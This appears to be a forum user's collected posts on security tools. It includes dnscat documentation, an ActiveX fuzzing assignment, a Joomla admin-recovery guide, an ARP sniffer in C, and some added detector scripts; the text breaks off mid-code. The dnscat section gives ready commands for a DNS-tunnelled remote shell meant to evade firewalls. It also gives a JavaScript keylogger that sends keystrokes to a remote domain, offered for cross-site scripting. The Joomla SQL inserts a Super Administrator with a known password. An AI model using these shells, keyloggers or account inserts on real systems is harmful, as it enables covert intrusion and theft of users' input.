Everything posted by begood
-
Ratio: 41.570 Uploaded: 13.90 TB Downloaded: 334.37 GB how much would you give for this?
-
Intro

dnscat is designed in the spirit of netcat, allowing two hosts over the Internet to talk to each other. The major difference between dnscat and netcat, however, is that dnscat routes all traffic through the local (or a chosen) DNS server. This has several major advantages:

* Bypasses pretty much all network firewalls
* Bypasses many local firewalls
* Doesn't pass through the typical gateway/proxy and therefore is stealthy

There are a lot of advantages to using the DNS protocol. There are, of course, several disadvantages as well:

* Data has to be encoded into alpha-numeric (DNS allows letters (not case sensitive) and numbers)
* DNS is slow -- it's not a direct connection
* The possibility of annoying DNS providers with the amount of traffic being sent through them
* dnscat requires the listener to be an authoritative DNS server

The last point is very important. To actually receive DNS traffic, you require either:

1. An authoritative nameserver, preferably one that isn't being used for anything else. This is what I'll be assuming for the rest of the documentation (see the next section for far more information)
2. The ability to connect to the dnscat server on udp/53 from the client (use the --dns flag to set the address) -- this is far less interesting, but will be faster if it works

One of the key netcat-like components of dnscat is the -e (or --exec) argument, which runs a program (such as /bin/sh or cmd.exe) and redirects its input and output through the connection. The --exec flag can be used on the client or server.

dnscat has been tested on, in alphabetical order:

* FreeBSD 7.2
* FreeBSD 8.0
* FreeBSD 8.0 amd64
* Mac OS X 10.4 (I think)
* Slackware 13
* Slackware 13-64
* Windows 2000
* Windows 2003
* Windows XP

It should work on any modern version of Linux, FreeBSD, or Windows.

To start a dnscat server, use the following command line:

    dnscat --listen

To start a dnscat client, use this command line:

    dnscat --domain <domain>

For example:

    dnscat --domain skullseclabs.org

You can also specify the DNS server to use, if the correct one wasn't chosen by using the --dns argument or if you don't have an authoritative nameserver and you want to make a direct UDP/53 connection:

    dnscat --domain skullseclabs.org --dns 4.2.2.1

Remember that the server has to be the authoritative nameserver for the domain given by the client, unless the --dns entry points directly to the dnscat server.

For more options, use --help:

    dnscat --help

Remote shell

Typically, to tunnel a shell over DNS, you're going to want to run a standard server as before:

    dnscat --listen

And run the shell on the client side:

Linux/BSD:

    dnscat --domain skullseclabs.org --exec "/bin/sh"

Windows:

    dnscat.exe --domain skullseclabs.org --exec "cmd.exe"

On the server, you can now type commands and they'll run on the client side.

Transfer a file

You can transfer a file to the client from the server like this:

Server:

    dnscat --listen > file.out

Client:

    dnscat --domain <domain> < file.in

You can change the direction that the file goes by switching around the redirects. To transfer from the server to the client, do this:

Server:

    dnscat --listen < file.in

Client:

    dnscat --domain <domain> > file.out

A couple things to note:

* No integrity checking is performed
* There is currently no indication when a transfer is finished

Tunnel another connection

This is my favourite thing to do, and it works really slick. You can use netcat to open a port-to-port tunnel through dnscat. I like this enough that I'm going to add netcat-like arguments in the next version.

Let's say that the client can connect to an ssh server on 192.168.2.100. The server is on an entirely different network and normally has no access to 192.168.2.100.

The whole situation is a little confusing because we want the dnscat client to connect to the ssh server (presumably, in real life, we'd be able to get a dnscat client on a target network, but not a dnscat server). "client" and "server" are such ancient terms anyways. I prefer to look at them as the sender and the receiver. A diagram might help:

    ssh client
        |
        | (port 1234 via netcat)
        v
    dnscat server
        ^
        |
        | (DNS server(s))
        |
    dnscat client
        |
        | (port 22 via netcat)
        v
    ssh server

It's like a good ol' fashioned double netcat relay. Ed Skoudis would be proud.

First, we start the netcat server. The server is going to run netcat, which listens on port 1234:

    dnscat --listen --exec "nc -l -p 1234"

If you connect to that host on port 1234, all data will be forwarded across DNS to the dnscat client.

Second, on the client side, dnscat connects to 192.168.2.100 port 22:

    dnscat --domain skullseclabs.org --exec "nc 192.168.2.100 22"

This connects to 192.168.2.100 on port 22. The input/output will both be sent across DNS back to the dnscat server, which will then send the traffic to whomever is connected on TCP/1234.

Third and finally, we ssh to our socket:

    ssh -p 1234 ron@127.0.0.1

One thing to note: at the moment, doing this is slooooow. But it works, and it's really, really cool!

Web keylogger

There is an implementation of dnscat in Javascript (jsdnscat) written by Stefan Penner. It's located in the 'samples' folder of nbtool and consists of two libraries, one for keylogging and the other for dnscat. There are several example HTML files for using these, but it really comes down to these lines:

```html
<script type='text/javascript' src='js/skullsecurity.all.min.js'></script>
<script type='text/javascript'>
  SkullSecurity.jsdnscat.config.host = 'yourdomain.com';
  SkullSecurity.keylogger.start(SkullSecurity.jsdnscat.send);
</script>
```

Equivalent code can easily be put into a .js file and hosted on your server for easy use with cross-site scripting.

The best reason for using this as opposed to traditional avenues for data exfiltration is to get around logging and firewalls -- because dnscat will respond with a localhost record to all A and AAAA requests, the computer doesn't actually send an HTTP request to the network, yet you still get its data.

Dnscat - Skull Security
download: Dnscat - Skull Security
jsdnscat: http://svn.skullsecurity.org:81/ron/security/nbtool-0.04/samples/jsdnscat/
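The post itself lists the tells a tunnel like this leaves in resolver logs: payload has to be encoded into alphanumeric labels, so query names carry long high-entropy labels, and a lot of them go to one domain. The following is an added example, not code from the dnscat project or from this post, showing how a defender can score a resolver query log for exactly those tells. The log line format, the thresholds, the "last two labels" domain heuristic and the sample lines are all constructed assumptions for the example.

```python
import math
from collections import defaultdict

# Constructed sample resolver log (not from the page): "<epoch> <client> <qname> <qtype>".
# The 32-character hex labels imitate the alphanumeric encoding a DNS tunnel has to use.
SAMPLE_LOG = """\
1700000000 10.0.0.5 www.example.com A
1700000000 10.0.0.5 mail.example.com AAAA
1700000001 10.0.0.5 cdn-static-assets-01.example.org A
1700000001 10.0.0.7 0123456789abcdeffedcba9876543210.1032547698badcfeefcdab8967452301.tunnel.example.net A
1700000001 10.0.0.7 2301452367ab89cdefcdab8967452301.0123456789abcdeffedcba9876543210.tunnel.example.net A
1700000002 10.0.0.7 fedcba98765432100123456789abcdef.1032547698badcfeefcdab8967452301.tunnel.example.net A
1700000002 10.0.0.7 1032547698badcfeefcdab8967452301.2301452367ab89cdefcdab8967452301.tunnel.example.net A
1700000003 10.0.0.7 www.example.com A
"""


def shannon_entropy(s):
    """Bits of entropy per character of s (0.0 for the empty string)."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registered_domain(qname):
    """Naive 'last two labels' heuristic (assumption); a real deployment would use the Public Suffix List."""
    labels = qname.rstrip(".").split(".")
    return ".".join(labels[-2:])


def is_suspicious_name(qname, min_label_len=24, min_entropy=3.2):
    """True when some label left of the registered domain is both long and high-entropy,
    i.e. looks like encoded payload rather than a hostname. Thresholds are assumptions."""
    labels = qname.rstrip(".").split(".")[:-2]
    return any(len(label) >= min_label_len and shannon_entropy(label) >= min_entropy
               for label in labels)


def tunnel_candidates(log_text, min_queries=3):
    """Count suspicious queries per (client, registered domain). A tunnel produces many of
    them to one domain, whereas a single odd-looking CDN hostname stays below the threshold."""
    counts = defaultdict(int)
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 4:
            continue  # skip malformed lines rather than crash the detector
        _ts, client, qname, _qtype = fields
        if is_suspicious_name(qname):
            counts[(client, registered_domain(qname))] += 1
    return {key: n for key, n in counts.items() if n >= min_queries}


if __name__ == "__main__":
    for (client, domain), n in tunnel_candidates(SAMPLE_LOG).items():
        print(f"{client} sent {n} payload-looking queries to {domain}")
```

Because a DNS label is at most 63 characters, tunnels spread their payload over several labels per name, which is why the check runs per label rather than on the whole name; the per-client count is what separates a tunnel from a legitimate service that happens to use one long hashed hostname.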
-
Mike Zusman explains fuzz testing, a special type of negative software testing.

Homework

Your assignment for this section is the following:

1. Locate a stack overflow in an ActiveX control by fuzzing it. Choose your target machine carefully. If you run a clean and patched Windows box, you might have a harder time finding something exploitable. See if you can run your tools on someone else's machine - preferably a machine with a lot of garbage software installed on it. COMRaider will more easily find the low-hanging fruit - the basic stack smash - and you should probably run this tool first. If you find nothing, run other fuzzers like Dranzer, AxRub, or AxMan.
2. Determine the exploitability of the overflow by investigating the stack with a debugger. COMRaider will show you debugger output in its own GUI. Double clicking on the exceptions will show a stack dump. AxMan will require use of an external debugger of your choosing. You get extra points if you use WinDBG and run the !exploitable plugin.
3. Reproduce the successful fuzz in a "Proof of Concept" that overwrites EIP with all A's. Even though COMRaider might show EIP overwritten, we still want to see a stand-alone script that demonstrates the vulnerability in a web browser. Additionally, you should identify the vulnerable DLL on the machine and grab a copy of it. This will be important if you are not testing on your own machine - you will want to take the DLL with you for further testing. For more information on registering DLLs on a Windows box, check out the Regsvr32 documentation.

What to hand in: One DLL, a PoC that crashes the DLL, a screenshot of the crash in a debugger.

Goals

The goal of the assignment is to introduce you to fuzzing and client-side attacks, not to develop working exploits against ActiveX objects. To that end, make sure that your homework demonstrates that you:

* know how to operate a fuzzer (step 1)
* know how to identify a successful fuzz (step 2)
* know how to reproduce a successful fuzz (step 3)
* are comfortable working with client-side "stuff" (in this case, ActiveX)

That's it!

Walkthrough

If you want a simple walkthrough before starting the assignment or if you've tried the assignment and can't find a vulnerable ActiveX, you can register the ActiveX included in this zip file which I guarantee is loaded with exploitable vulnerabilities. To make things simple, just register it and then point COMRaider directly at it. The vulnerable function is foobar() and pretty much anything it accepts will generate a stack overflow. If you don't see "ACCESS VIOLATION", you're doing something wrong. If you see error messages saying "Cannot Create Object", you have not registered the DLL correctly.

If you're still having problems finding an ActiveX to fuzz, try some of these:

* ActiveX 1
* ActiveX 2
* ActiveX 3

Reading Material

* Information on ActiveX
* Fuzzing Software
* Registering COM DLLs
* Jared DeMott - The Evolving Art of Fuzzing (whitepaper) (slides)

video & source: Penetration Testing and Vulnerability Analysis - Fuzzing - Fuzzing101
-
Normally, you can add, edit and delete users and passwords from the back-end User Manager. To do this, you must be logged in as a member of the Super Administrator group. In some situations, this may not be possible. For example, your site may have been "hacked" and had the passwords or users changed. Or perhaps the person who knew the passwords is no longer available. Or maybe you have forgotten the password that was used. In these cases, it is still possible to fix up the Joomla! database so you can log back in as a Super Administrator. There are three possible methods discussed below.

Use the Lost Password Feature

If you have access to the email address that was used for the admin user, and you have made the "lost password" feature available on the front end, the simplest thing to do is to use the "lost password" Front-end function. The site will send an e-mail to the user's e-mail address and allow you to change the password. If this method will not work, you have two other options, both of which require working with the MySQL database directly.

Change the Password in the Database

If the admin user is still defined, the simplest option is to change the password in the database to a known value. This requires that you have access to the MySQL database using phpMyAdmin.

1. Navigate to phpMyAdmin and select the database for the Joomla! site in the left-hand drop-down list box. This will show the database tables on the left side of the screen.
2. Click on the table "jos_users" in the list of tables.
3. Click on the "Browse" button in the top toolbar. This will show all of the users that are set up for this site.
4. Find the user whose password you want to change and press the Edit icon for this row.
5. A form will display that allows you to edit the password field. Copy the value d2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199 into the password field and press the Go button. phpMyAdmin should display the message "Affected rows: 1". At this point, the password should be changed to "secret".
6. Log in with this user and password and change the password of this user to a secure value. Check all of the users using the User Manager to make sure they are legitimate. If you have been hacked, you may want to change all of the passwords on the site.

Add a New Super Administrator User

If changing the password won't work, or you aren't sure which user is a member of the Super Administrator group, you can use this method to create a new user.

1. Navigate to phpMyAdmin and select the database for the Joomla! site in the left-hand drop-down list box. This will show the database tables on the left side of the screen.
2. Press the "SQL" button in the toolbar to run a SQL query on the selected database. This will display a field called "Run SQL query/queries on database <your database>".
3. Delete any text in this field and paste in the following and press the Go button.

```sql
INSERT INTO `jos_users`
    (`id`, `name`, `username`, `email`, `password`, `usertype`, `block`, `sendEmail`, `gid`, `registerDate`, `lastvisitDate`)
VALUES
    (NULL, 'Administrator2', 'admin2', 'your-email@yourdomain.com',
     'd2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199',
     'Super Administrator', 0, 1, 25, '0000-00-00 00:00:00', '0000-00-00 00:00:00');
INSERT INTO `jos_core_acl_aro` VALUES (NULL, 'users', LAST_INSERT_ID(), 0, 'Administrator', 0);
INSERT INTO `jos_core_acl_groups_aro_map` VALUES (25, '', LAST_INSERT_ID());
```

At this point, you should be able to log into the back end of Joomla! with the username of "admin2" and password of "secret". After logging in, go to the User Manager and change the password to a secure value and the e-mail to a valid e-mail address. If there is a chance you have been "hacked", be sure to check that all users are legitimate, especially any members of the Super Administrator group.

The examples above change the password to "secret". Two other possible values are shown below:

    password = "this is the MD5 and salted hashed password"
    ------------------------------------------------------
    admin    = 433903e0a9d6a712e00251e44d29bf87:UJ0b9J5fufL3FKfCc0TLsYJBh2PFULvT
    secret   = d2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199
    OU812    = 5e3128b27a2c1f8eb53689f511c4ca9e:J584KAEv9d8VKwRGhb8ve7GdKoG7isMm
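Each of the stored values above is 32 hex characters, a colon and a 32-character alphanumeric salt, which is the Joomla 1.5-era layout md5(password + salt) ':' salt (an assumption based on the `jos_` tables and gid 25 used in the post). The example below is added here and is not from the Joomla documentation: it produces a fresh value in that layout with a random salt, so you never have to write a published hash whose password and salt everyone can read into a live table, and it verifies a password against a stored value with a constant-time comparison. The function names are my own.

```python
import hashlib
import hmac
import secrets
import string

# Joomla 1.5 salts are 32 characters drawn from letters and digits (assumption matching the
# published values above, which are 32 alphanumeric characters after the colon).
SALT_ALPHABET = string.ascii_letters + string.digits
SALT_LENGTH = 32


def make_salt():
    """Return a fresh 32-character alphanumeric salt from the CSPRNG."""
    return "".join(secrets.choice(SALT_ALPHABET) for _ in range(SALT_LENGTH))


def joomla15_hash(password, salt=None):
    """Produce '<md5(password + salt)>:<salt>', the layout of the values above.
    A fresh random salt is used unless one is passed in explicitly."""
    if salt is None:
        salt = make_salt()
    if len(salt) != SALT_LENGTH or any(c not in SALT_ALPHABET for c in salt):
        raise ValueError("salt must be 32 alphanumeric characters")
    digest = hashlib.md5((password + salt).encode("utf-8")).hexdigest()
    return f"{digest}:{salt}"


def joomla15_verify(password, stored):
    """Check a password against a stored '<digest>:<salt>' value.
    hmac.compare_digest avoids leaking how many leading characters matched."""
    digest, sep, salt = stored.partition(":")
    if sep != ":" or len(digest) != 32 or not salt:
        return False  # malformed value, e.g. a plaintext someone pasted into the column
    expected = hashlib.md5((password + salt).encode("utf-8")).hexdigest()
    return hmac.compare_digest(expected, digest)


if __name__ == "__main__":
    # Paste this value into the jos_users.password field instead of the published one,
    # then log in and change the password again from the User Manager.
    print(joomla15_hash("secret"))
```

Unsalted-or-salted MD5 is a fast hash, so any value of this form, published or generated, is only a foothold to get back into the back end; the steps above are right to insist on changing the password again from the User Manager once logged in.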
-
So, you have a nice shiny DVD with your favorite movie, and your dog chews it to pieces. If only you had ripped that movie to a file that you could burn to a new DVD, or play on your favorite media player. In this video tutorial I show those of you outside of the United States** how to do this in Linux. First we need to install several libraries, including libdvdcss2 (for help installing this see my previous video here). Then we install a DVD ripper (I chose Thoggen because it is quick and easy). And that's it, you can rip away to your heart's content!

Thoggen: thoggen - DVD backup/ripping with style
HandbrakeGTK: HandBrake

The DVD ripping program I chose was Thoggen for its ease of use and simplicity. It automatically rips the DVD to .OGM (Ogg media) format. VLC and other media players should be able to play this without a problem, but if you need help installing codecs install ffmpeg (see my video here where I explain it) as it contains a whole codec library. Other DVD ripping programs can save to other formats, so feel free to install and use the ripper of your choice.

video: Howto Rip a DVD - Easy and Free with Linux | LinuxHaxor.net
-
ARP Sniff (Sniffer Lite) is a tiny ARP sniffer. This tool will be useful to analyze the ARP packets in the network. The tool gives out two types of information, the 14 byte Ethernet header and 28 byte ARP header. The tool requires G++ compiler and a libpcap package. Three arguments are coded as of now. One is to list the available devices, second is to sniff the default device and third is to sniff the device given as argument. The sniffer outputs the Ethernet header (Source MAC address, Destination MAC address and Ethernet type), ARP Header (Hardware type, Protocol type, Hardware address length, Protocol address length, Opcode, Source Hardware address and Protocol address, Destination hardware address and Protocol address).

18ae58b999b218c41f4714dc43037caf

```cpp
/***************************************************************************
 *   Copyright (C) 2010 by Velan.                                          *
 *   vlabs.c@gmail.com                                                     *
 *                                                                         *
 *   This program is free software; you can redistribute it and/or modify  *
 *   it under the terms of the GNU General Public License as published by  *
 *   the Free Software Foundation; either version 2 of the License, or     *
 *   (at your option) any later version.                                   *
 *                                                                         *
 *   This program is distributed in the hope that it will be useful,       *
 *   but WITHOUT ANY WARRANTY; without even the implied warranty of        *
 *   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the         *
 *   GNU General Public License for more details.                          *
 *                                                                         *
 *   You should have received a copy of the GNU General Public License     *
 *   along with this program; if not, write to the                         *
 *   Free Software Foundation, Inc.,                                       *
 *   59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.             *
 ***************************************************************************/
// 0.0.5 - included ethernet header, modified ARP header, changing ARP processing by including ntohs; etc
// dependencies - libpcap -> tcpdump.org
// compilation  - g++ arp_sniff.cc -o arp_sniff -lpcap
#ifdef HAVE_CONFIG_H
#include <config.h>
#endif
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <pcap.h>

void List_Devices();
void Sniff_Device(const char *Device);
void Got_ARP_Packet(u_char *args, const struct pcap_pkthdr *header, const u_char *packet);

// Ethernet header - 14 bytes
typedef struct EthernetHeader_StructMain {
    u_char  DestinationMACAddress[6];
    u_char  SourceMACAddress[6];
    u_short Type;
} Struct_EthernetHeader;

// ARP header - 28 bytes (Ethernet/IPv4 only: 6-byte hardware and 4-byte protocol addresses)
typedef struct ARPHeader_StructMain {
    u_int16_t HardwareType;                  // hardware type
    u_int16_t ProtocolType;                  // protocol type
    u_char    HardwareAddressLength;         // hardware address length
    u_char    ProtocolAddressLength;         // protocol address length
    u_int16_t Opcode;                        // opcode - request, reply, reverse request ...
    u_char    SourceHardwareAddress[6];      // source MAC address
    u_char    SourceProtocolAddress[4];      // source IP address
    u_char    DestinationHardwareAddress[6]; // target MAC address
    u_char    DestinationProtocolAddress[4]; // target IP address
} Struct_ARPHeader;

int main(int argc, char *argv[])
{
    printf("Sniffer Lite. by Velan. vlabs.c@gmail.com\nThis module contains the ARPSniffer.\n");
    if (argc < 2) {
        printf("\nUsage: %s [ld] [device name]\narg\t\tfunction\n", argv[0]);
        printf("-l\t\tlisting available devices\n");
        printf("-d\t\tuse default device\n");
        printf("\n");
        return 0;
    }
    if (strncmp(argv[1], "-l", 2) == 0) {
        List_Devices();
    } else if (strncmp(argv[1], "-d", 2) == 0) {
        printf("Selecting default device. ");
        Sniff_Device("-d");
    } else if (argc == 2) {
        Sniff_Device(argv[1]);   // interface name given on the command line
    }
    return 0;
}

void List_Devices()
{
    pcap_if_t *All_Devices_SP, *d;
    char pcap_errbuf[PCAP_ERRBUF_SIZE];

    printf("Listing available devices.\n");
    if (pcap_findalldevs(&All_Devices_SP, pcap_errbuf) == -1) {
        printf("Error in looking up all available devices. %s\n", pcap_errbuf);
        exit(-1);
    }
    printf("\n----------------------------\nDevice\t\tDescription\n----------------------------\n");
    for (d = All_Devices_SP; d; d = d->next) {
        // description may be NULL for interfaces without one
        printf("%s\t\t%s\n", d->name, d->description ? d->description : "");
    }
    printf("\n");
    pcap_freealldevs(All_Devices_SP);
    exit(0);
}

void Sniff_Device(const char *Device)
{
    char pcap_errbuf[PCAP_ERRBUF_SIZE];
    const char *dev = NULL;
    pcap_t *pcap_handle;
    bpf_u_int32 pcap_device_mask;
    bpf_u_int32 pcap_device_ip;
    struct bpf_program filter;
    struct in_addr addr;

    if (strncmp(Device, "-d", 2) == 0) {
        dev = pcap_lookupdev(pcap_errbuf);   // deprecated in newer libpcap, still available
        if (dev == NULL) {
            printf("Error in looking up default device. %s\n", pcap_errbuf);
            exit(1);
        }
        printf("Default device: %s, ", dev);
    } else {
        dev = Device;
    }
    if (pcap_lookupnet(dev, &pcap_device_ip, &pcap_device_mask, pcap_errbuf) == -1) {
        printf("Error in lookup device. %s\n", pcap_errbuf);
        exit(1);
    }
    printf("opening the device %s for sniffing\n", dev);

    // pcap_lookupnet returns the address and mask in network byte order,
    // so inet_ntoa prints them correctly regardless of host endianness
    addr.s_addr = pcap_device_ip;
    printf("Sniffing device IP: %s, ", inet_ntoa(addr));
    addr.s_addr = pcap_device_mask;
    printf("Mask: %s\n", inet_ntoa(addr));
    printf("\n\n");

    pcap_handle = pcap_open_live(dev, 1000, 0, 10000, pcap_errbuf);
    if (pcap_handle == NULL) {
        printf("Error opening device %s: %s\n", dev, pcap_errbuf);
        exit(1);
    }
    // create a filter to grab only ARP and apply it to the handle
    if (pcap_compile(pcap_handle, &filter, "arp", 1, pcap_device_mask) == -1 ||
        pcap_setfilter(pcap_handle, &filter) == -1) {
        printf("Error setting ARP filter: %s\n", pcap_geterr(pcap_handle));
        exit(1);
    }
    printf("______________________________________________________\n\n");
    pcap_loop(pcap_handle, -1, Got_ARP_Packet, NULL);   // -1 means unlimited packets
    pcap_close(pcap_handle);
}

// IANA hardware type names, indexed by type value
static const char *Hardware_Type_Name(u_int16_t type)
{
    static const char *names[] = {
        "Reserved", "Ethernet", "Experimental Ethernet", "Amateur Radio AX25",
        "Proteon ProNET Token Ring", "Chaos", "IEEE 802", "ARCNET", "Hyperchannel",
        "Lanstar", "Autonet Short Address", "LocalTalk",
        "LocalNet (IBM PCNet or SYTEK LocalNET)", "Ultra link", "SMDS", "Frame Relay",
        "ATM, Asynchronous Transmission Mode", "HDLC", "Fibre Channel",
        "ATM, Asynchronous Transmission Mode", "Serial Line",
        "ATM, Asynchronous Transmission Mode", "MIL-STD-188-220", "Metricom",
        "IEEE 1394.1995", "MAPOS", "Twinaxial", "EUI-64", "HIPARP",
        "IP and ARP over ISO 7816-3", "ARPSec", "IPsec tunnel", "Infiniband",
        "CAI, TIA-102 Project 25 Common Air Interface", "Wiegand Interface",
        "Pure IP", "HW_EXP1"
    };
    if (type < sizeof(names) / sizeof(names[0])) return names[type];
    if (type == 256)   return "HW_EXP2";
    if (type == 65535) return "Reserved";
    return "Unknown";
}

// IANA ARP opcode names, indexed by opcode value
static const char *Opcode_Name(u_int16_t op)
{
    static const char *names[] = {
        "Reserved", "Request", "Reply", "Request Reverse", "Reply Reverse",
        "DRARP Request", "DRARP Reply", "DRARP Error", "InARP Request", "InARP Reply",
        "ARP NAK", "MARS Request", "MARS Multi", "MARS MServ", "MARS Join", "MARS Leave",
        "MARS NAK", "MARS Unserv", "MARS SJoin", "MARS SLeave", "MARS Grouplist Request",
        "MARS Grouplist Reply", "MARS Redirect Map", "MAPOS UNARP", "OP_EXP1", "OP_EXP2"
    };
    if (op < sizeof(names) / sizeof(names[0])) return names[op];
    return "Unknown";
}

static void Print_MAC(const u_char *mac)
{
    for (int j = 0; j < 6; j++)
        printf("%02X%s", mac[j], j != 5 ? ":" : "");
}

static void Print_IP(const u_char *ip)
{
    for (int j = 0; j < 4; j++)
        printf("%d%s", ip[j], j != 3 ? "." : "");
}

void Got_ARP_Packet(u_char *args, const struct pcap_pkthdr *header, const u_char *packet)
{
    // hardware vendor OUIs (first three bytes of the MAC address)
    // 000000-000009 - XEROX CORPORATION.  00000C - CISCO SYSTEMS, INC.  00001A - ADVANCED MICRO DEVICES
    // 0002B3 - Intel Corporation.  0001E6 - Hewlett-Packard Company.  000255 - IBM Corporation
    // 00065B - Dell Computer Corp.  000102 - 3COM CORPORATION  00178D - Checkpoint Systems, Inc.
    // 000585 - Juniper Networks, Inc.  000569, 000C29, 001C14, 005056 - VMWare Inc.
    static const char *MAC_IDs[23] = {
        "000000", "000001", "000002", "000003", "000004", "000005", "000006", "000007",
        "000008", "000009", "00000C", "00001A", "0002B3", "0001E6", "000255", "00065B",
        "000102", "00178D", "000585", "000569", "000C29", "001C14", "005056"
    };
    static const char *MAC_Vendors[23] = {
        "XEROX CORPORATION", "XEROX CORPORATION", "XEROX CORPORATION", "XEROX CORPORATION",
        "XEROX CORPORATION", "XEROX CORPORATION", "XEROX CORPORATION", "XEROX CORPORATION",
        "XEROX CORPORATION", "XEROX CORPORATION", "CISCO SYSTEMS, INC.", "ADVANCED MICRO DEVICES",
        "Intel Corporation.", "Hewlett-Packard Company.", "IBM Corporation", "Dell Computer Corp.",
        "3COM CORPORATION", "Checkpoint Systems, Inc.", "Juniper Networks, Inc.", "VMWare Inc.",
        "VMWare Inc.", "VMWare Inc.", "VMWare Inc."
    };
    char MACID[7];   // six hex digits plus the terminating NUL
    unsigned int j, found = 0;
    (void)args;

    // refuse to overlay the headers on a frame shorter than Ethernet (14) + ARP (28)
    if (header->caplen < sizeof(Struct_EthernetHeader) + sizeof(Struct_ARPHeader)) {
        printf("Truncated frame (%u bytes captured), skipping\n\n", header->caplen);
        return;
    }
    const Struct_EthernetHeader *EthernetHeader = (const Struct_EthernetHeader *) packet;
    const Struct_ARPHeader *ARPHeader = (const Struct_ARPHeader *) (packet + 14);

    // the 16-bit fields arrive in network byte order
    u_int16_t HardwareType_Host = ntohs(ARPHeader->HardwareType);
    u_int16_t ProtocolType_Host = ntohs(ARPHeader->ProtocolType);
    u_int16_t Opcode_Host       = ntohs(ARPHeader->Opcode);
    u_char HardwareAddressLength_Host = ARPHeader->HardwareAddressLength;
    u_char ProtocolAddressLength_Host = ARPHeader->ProtocolAddressLength;

    // print Ethernet header - 14 bytes
    printf("Ethernet packet - Frame II: ");
    Print_MAC(EthernetHeader->SourceMACAddress);
    printf(" > ");
    Print_MAC(EthernetHeader->DestinationMACAddress);
    printf(", Type: 0x%X\n", ntohs(EthernetHeader->Type));

    // print ARP header - 28 bytes
    printf("ARP Header: ");
    Print_IP(ARPHeader->SourceProtocolAddress);
    printf(" > ");
    Print_IP(ARPHeader->DestinationProtocolAddress);
    printf("\t\t=\tMAC: ");
    Print_MAC(ARPHeader->SourceHardwareAddress);
    printf(" > ");
    Print_MAC(ARPHeader->DestinationHardwareAddress);
    printf("\n\t\t");
    printf("Hardware type: %s (0x%X), ", Hardware_Type_Name(HardwareType_Host), HardwareType_Host);
    printf("Protocol: %s (0x%X), ", ProtocolType_Host == 0x0800 ? "IP" : "", ProtocolType_Host);
    printf("Opcode: %s (0x%X)", Opcode_Name(Opcode_Host), Opcode_Host);
    printf("\n\t\t");
    printf("Hardware address length: %u, Protocol address length: %u",
           HardwareAddressLength_Host, ProtocolAddressLength_Host);
    printf("\n\t\t");

    // print hardware vendor name from the OUI
    snprintf(MACID, sizeof(MACID), "%02X%02X%02X",
             ARPHeader->SourceHardwareAddress[0],
             ARPHeader->SourceHardwareAddress[1],
             ARPHeader->SourceHardwareAddress[2]);
    printf("Source Ethernet Vendor: ");
    for (j = 0; j < 23; j++) {
        if (strncmp(MAC_IDs[j], MACID, 6) == 0) {
            printf("%s\n", MAC_Vendors[j]);
            found = 1;
            break;
        }
    }
    if (!found) {
        printf("Unknown. oui id: %s. Refer http://standards.ieee.org/regauth/oui/oui.txt\n", MACID);
    }
    printf("\n______________________________________________________\n\n");
}
```
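The sniffer above overlays the 14-byte Ethernet and 28-byte ARP structures on the raw packet and byte-swaps the 16-bit fields with ntohs. The example below is an added one, not part of Sniffer Lite, that does the same decoding in Python over constructed frames, with the length and ethertype checks that belong before any cast, and then does the one thing a defender usually wants from a continuous ARP feed: report an IP address that is claimed by two different MAC addresses. The frame builder, the sample addresses and the small OUI table are constructed for the example; the OUI prefixes come from the sniffer's own table.

```python
import struct

ETHERTYPE_ARP = 0x0806
# Subsets of the tables the sniffer prints (assumption: same IANA numbering as the C code).
HW_TYPES = {0: "Reserved", 1: "Ethernet", 6: "IEEE 802", 65535: "Reserved"}
OPCODES = {1: "Request", 2: "Reply", 3: "Request Reverse", 4: "Reply Reverse"}
OUI = {"00000C": "CISCO SYSTEMS, INC.", "000C29": "VMWare Inc.", "001C14": "VMWare Inc.",
       "005056": "VMWare Inc."}


def fmt_mac(raw):
    return ":".join(f"{b:02X}" for b in raw)


def fmt_ip(raw):
    return ".".join(str(b) for b in raw)


def parse_arp_frame(frame):
    """Decode the 14-byte Ethernet header and the 28-byte Ethernet/IPv4 ARP header.
    The '!' in the struct format reads 16-bit fields big-endian, which is what ntohs() does."""
    if len(frame) < 42:
        raise ValueError(f"frame is {len(frame)} bytes, need 14 + 28")
    dst, src, ethertype = struct.unpack("!6s6sH", frame[:14])
    if ethertype != ETHERTYPE_ARP:
        raise ValueError(f"not an ARP frame (ethertype 0x{ethertype:04X})")
    htype, ptype, hlen, plen, op, sha, spa, tha, tpa = struct.unpack("!HHBBH6s4s6s4s", frame[14:42])
    if (hlen, plen) != (6, 4):
        raise ValueError(f"unsupported address lengths hlen={hlen} plen={plen}")
    return {
        "eth_src": fmt_mac(src), "eth_dst": fmt_mac(dst),
        "hw_type": HW_TYPES.get(htype, "Unknown"), "proto_type": ptype,
        "opcode": op, "opcode_name": OPCODES.get(op, "Unknown"),
        "sender_mac": fmt_mac(sha), "sender_ip": fmt_ip(spa),
        "target_mac": fmt_mac(tha), "target_ip": fmt_ip(tpa),
        "sender_vendor": OUI.get(sha[:3].hex().upper(), "Unknown"),
    }


def build_arp_frame(op, sender_mac, sender_ip, target_mac, target_ip):
    """Serialise a constructed Ethernet/IPv4 ARP frame; used here only to make sample input.
    Requests go to the broadcast address, replies to the requester's MAC."""
    eth_dst = b"\xff" * 6 if op == 1 else target_mac
    eth = struct.pack("!6s6sH", eth_dst, sender_mac, ETHERTYPE_ARP)
    arp = struct.pack("!HHBBH6s4s6s4s", 1, 0x0800, 6, 4, op,
                      sender_mac, sender_ip, target_mac, target_ip)
    return eth + arp


def find_ip_mac_conflicts(frames):
    """Remember which MAC each IP claims in ARP replies and report any IP that is later
    claimed by a different MAC. A conflict can mean ARP spoofing, but also a NIC swap or
    DHCP reassignment, so treat it as a lead to investigate rather than proof."""
    claims = {}
    conflicts = []
    for frame in frames:
        arp = parse_arp_frame(frame)
        if arp["opcode"] != 2:
            continue
        ip, mac = arp["sender_ip"], arp["sender_mac"]
        if ip in claims and claims[ip] != mac:
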